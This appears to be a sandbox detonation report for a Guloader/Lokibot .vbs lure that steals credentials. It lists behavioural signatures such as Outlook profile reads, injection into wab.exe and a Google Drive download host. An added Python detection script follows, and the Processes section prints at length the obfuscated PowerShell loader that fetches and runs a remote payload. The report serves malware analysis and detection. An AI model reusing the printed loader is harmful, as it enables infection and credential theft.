Analysis Overview
SHA256
56477d17f71d7e5912340580f96f8df535b19eb9cb96da14ccf741bcd465ee68
Threat Level: Known bad
The file 56477d17f71d7e5912340580f96f8df535b19eb9cb96da14ccf741bcd465ee68 was found to be: Known bad.
Malicious Activity Summary
Lokibot
Guloader,Cloudeye
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Command and Scripting Interpreter: PowerShell
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Suspicious behavior: MapViewOfSection
outlook_office_path
outlook_win_path
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-09 19:32
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-09 19:32
Reported
2024-09-09 19:35
Platform
win10v2004-20240802-en
Max time kernel
107s
Max time network
142s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4664 set thread context of 4068 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\windows mail\wab.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
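The signature rows above describe one chain: WScript.exe runs the .vbs lure and starts a 64-bit powershell.exe; a second copy of the same command line runs under SysWOW64 powershell.exe; that 32-bit PowerShell sets the thread context of wab.exe (PID 4664 on 4068); and the injected wab.exe then opens the Outlook profile keys before it crashes under WerFault. The following is an added example, not part of the sandbox output or of any vendor product: a Python pass that turns those observations into detection logic over constructed, Sysmon-like events. The Event shape and the alert names are the example's own. Images, registry keys and PIDs 4664 and 4068 come from this report; PID 3976 for the 64-bit PowerShell (the 64-bit address-space PID in the memory dump list), the parent links, the WScript PID and the benign control event are assumptions.

```python
"""Detection pass over process, SetThreadContext and registry-open events for
the chain this detonation shows: WScript.exe -> powershell.exe -> SysWOW64
powershell.exe -> wab.exe, then wab.exe reading Outlook profile keys.
Added example for this page, not sandbox output. Event is the example's own
Sysmon-like shape; images, keys and PIDs 4664/4068 come from the report,
PID 3976 for the 64-bit PowerShell, the parent links, the WScript PID and
the benign control event are assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class Event:
    kind: str                         # "proc" (created), "ctx" (SetThreadContext), "reg" (key opened)
    pid: int
    image: str
    parent_image: str = ""
    cmdline: str = ""
    target_pid: Optional[int] = None  # ctx only: process whose thread was modified
    key: str = ""                     # reg only: registry path opened


SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")
POWERSHELL = "\\powershell.exe"
WOW64_POWERSHELL = "\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
WAB = "\\windows mail\\wab.exe"
OUTLOOK_PROFILE_KEYS = (  # keys wab.exe opened in this report, matched case-insensitively
    "\\software\\microsoft\\office\\16.0\\outlook\\profiles\\outlook",
    "\\software\\microsoft\\office\\15.0\\outlook\\profiles\\outlook",
    "\\software\\microsoft\\windows nt\\currentversion\\windows messaging subsystem\\profiles\\outlook",
)
# Verbatim in this sample's command line: the ${host}.Runspace check, a method
# called through its name string, and a call through a variable ("& (").
LOADER_MARKERS = ("${host}.runspace", ".'invoke'(", "& (")
_PIECEWISE = re.compile(r"\$\w+\+='[^']{1,4}';")  # "$var+='su';" method-name assembly


def _is(image: str, suffix: str) -> bool:
    return image.lower().endswith(suffix)


def looks_like_staged_loader(cmdline: str) -> bool:
    """Two literal markers, or three piecewise appends; an admin one-liner has neither."""
    low = cmdline.lower()
    markers = sum(1 for m in LOADER_MARKERS if m in low)
    return markers >= 2 or len(_PIECEWISE.findall(cmdline)) >= 3


def detect(events: List[Event]) -> List[str]:
    """One alert per matching event, plus a correlated alert for any wab.exe PID that
    was both the target of SetThreadContext and opened an Outlook profile key."""
    image_by_pid: Dict[int, str] = {e.pid: e.image for e in events if e.kind == "proc"}
    alerts: List[str] = []
    hollowed: Set[int] = set()
    readers: Set[int] = set()
    for e in events:
        if e.kind == "proc" and _is(e.image, POWERSHELL):
            if any(_is(e.parent_image, h) for h in SCRIPT_HOSTS) and looks_like_staged_loader(e.cmdline):
                alerts.append(f"script_host_spawned_obfuscated_powershell pid={e.pid}")
        elif e.kind == "proc" and _is(e.image, WAB) and _is(e.parent_image, WOW64_POWERSHELL):
            alerts.append(f"wow64_powershell_spawned_wab pid={e.pid}")
        elif e.kind == "ctx" and _is(e.image, POWERSHELL) and _is(image_by_pid.get(e.target_pid, ""), WAB):
            hollowed.add(e.target_pid)
            alerts.append(f"powershell_set_thread_context_on_wab pid={e.pid} target={e.target_pid}")
        elif e.kind == "reg" and _is(e.image, WAB) and any(e.key.lower().endswith(k) for k in OUTLOOK_PROFILE_KEYS):
            readers.add(e.pid)
            alerts.append(f"wab_opened_outlook_profile pid={e.pid}")
    for pid in sorted(hollowed & readers):
        alerts.append(f"injected_wab_credential_access pid={pid}")
    return alerts


PS64 = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
PS32 = "C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"
WSCRIPT, WAB_EXE = "C:\\Windows\\System32\\WScript.exe", "C:\\Program Files (x86)\\windows mail\\wab.exe"
HIVE = "\\REGISTRY\\USER\\S-1-5-21-1302416131-1437503476-2806442725-1000"
# Opening of the script as the Processes list shows it; the real command line runs on for kilobytes.
LOADER_CMDLINE = (
    "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;"
    "$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';"
    "$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};"
    "Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;"
    "$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph"
    ".'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}"
    "function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}"
)
SAMPLE_EVENTS = [  # constructed to mirror the behavioral2 detonation
    Event("proc", 2460, WSCRIPT, "C:\\Windows\\explorer.exe",
          '"C:\\Windows\\System32\\WScript.exe" "C:\\Users\\Admin\\AppData\\Local\\Temp\\BID REQUEST 09-09-2024·pdf.vbs"'),
    Event("proc", 3976, PS64, WSCRIPT, LOADER_CMDLINE),
    Event("proc", 4664, PS32, PS64, LOADER_CMDLINE),
    Event("proc", 4068, WAB_EXE, PS32, f'"{WAB_EXE}"'),
    Event("ctx", 4664, PS32, target_pid=4068),
    Event("reg", 4068, WAB_EXE, key=HIVE + "\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"),
    Event("reg", 4068, WAB_EXE, key="\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\NLS\\Language"),
    Event("proc", 5120, PS64, "C:\\Windows\\explorer.exe",  # benign control
          "powershell.exe -NoProfile -Command \"Get-Service | Where-Object {$_.Status -eq 'Running'}\""),
]

if __name__ == "__main__":
    print("\n".join(detect(SAMPLE_EVENTS)))
```

Each rule on its own is weak evidence: wab.exe is a signed Windows binary, and a PowerShell child of WScript.exe also shows up in admin tooling. The alert worth paging on is the correlated one, which requires the same wab.exe PID to be the target of SetThreadContext and then to open a profile key; in the tables above that is the "PID 4664 set thread context of 4068" row followed by the three "Accesses Microsoft Outlook profiles" rows. The NLS\Language read by the same process is deliberately left out of the match list, since it is noise from the loader's locale check. The loader markers are literal fragments of this sample's command line, so they will drift with the next build; the piecewise-append regex is the more durable of the two signals.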
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? 
F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. 
PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab 
UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. 
S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? 
F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. 
PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab 
